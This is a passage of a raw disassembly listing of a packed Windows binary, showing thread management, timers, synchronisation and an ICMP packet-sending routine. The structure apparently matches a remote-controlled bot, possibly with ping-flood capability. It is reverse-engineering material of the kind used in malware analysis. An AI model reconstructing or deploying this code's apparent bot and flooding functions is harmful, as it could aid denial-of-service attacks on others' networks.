call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_41E3A0, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: sub_4083AD+61�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: sub_408B30:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, ds:dword_41E3A0
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call ds:dword_4170D0 ; GetTickCount
sub eax, ds:dword_41E3A0
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: UPX0:004168C6�p
push ebp
mov ebp, esp
and ds:dword_41E3C0, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov ds:dword_41E3C8, eax
push offset dword_41E3A8
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093B6 proc near ; DATA XREF: sub_409479+35�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_1C], eax
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push [ebp+var_20]
call ds:dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp ds:dword_41DF08, 0
jz short loc_40942F
push [ebp+var_20]
push offset dword_419474
push offset dword_41DB88
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: sub_4093B6+62�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_4093B6+59�j
push [ebp+var_1C]
call [ebp+var_20]
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: sub_4093B6:loc_40942F�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_409466: ; CODE XREF: sub_4093B6+91�j
xor eax, eax
loc_409468: ; CODE XREF: sub_4093B6+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4093B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: sub_40764D+14A�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset sub_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call ds:dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094E6 proc near ; DATA XREF: sub_4095A4+159�o
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, ds:byte_41DF00
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp+var_1A0], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push [ebp+arg_0]
mov eax, [ebp+arg_0]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp+var_1A4], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1A4]
jmp short loc_409593
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_409593: ; CODE XREF: sub_4094E6+8A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4094E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E3A8
call sub_409C6C
pop ecx
cmp ds:dword_41E3C0, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, ds:dword_41E3C8
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, ds:dword_41E3C0
inc eax
mov ds:dword_41E3C0, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset sub_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: sub_401244+73�p
; sub_401244+547�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call ds:dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E3A8
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E3A8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, ds:dword_41E3C0
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, ds:dword_41E3C8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E3A8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_8]
call ds:dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, ds:dword_41E3C0
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, ds:dword_41E3C0
dec eax
mov ds:dword_41E3C0, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, ds:dword_41E3C8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call ds:dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call ds:dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD5 proc near ; DATA XREF: sub_409BF1+2A�o
var_1A8 = byte ptr -1A8h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
cmp ds:dword_41E3C0, 0
jz short loc_409B25
push 10h
push ds:dword_41E3C0
push offset dword_4194EC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: sub_409AD5+30�j
push offset dword_4194CC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: sub_409AD5+4E�j
push offset dword_41E3A8
call sub_409C6C
pop ecx
and [ebp+var_10], 0
and [ebp+var_4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: sub_409AD5:loc_409BDB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409B5B: ; CODE XREF: sub_409AD5+7D�j
cmp [ebp+var_4], 10h
jge short loc_409BE0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E3A8
call sub_409C7A
pop ecx
push 3E8h
call ds:dword_41709C ; Sleep
push offset dword_41E3A8
call sub_409C6C
pop ecx
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
lea eax, [ecx+eax+14h]
push eax
push [ebp+var_4]
push offset dword_4194BC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, ds:dword_41E3C8
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: sub_409AD5+A0�j
; sub_409AD5+102�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: sub_409AD5+8A�j
; sub_409AD5+104�j
push offset dword_41E3A8
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: sub_409AD5+65�j
leave
retn 4
sub_409AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset sub_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp ds:dword_41DF10, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call ds:dword_41DF10 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call ds:dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: sub_40332B+10�p
; sub_41113B+7ED�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: sub_409DD0+202�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call ds:dword_41E3CC
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call ds:dword_41E3D8
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
call ds:dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
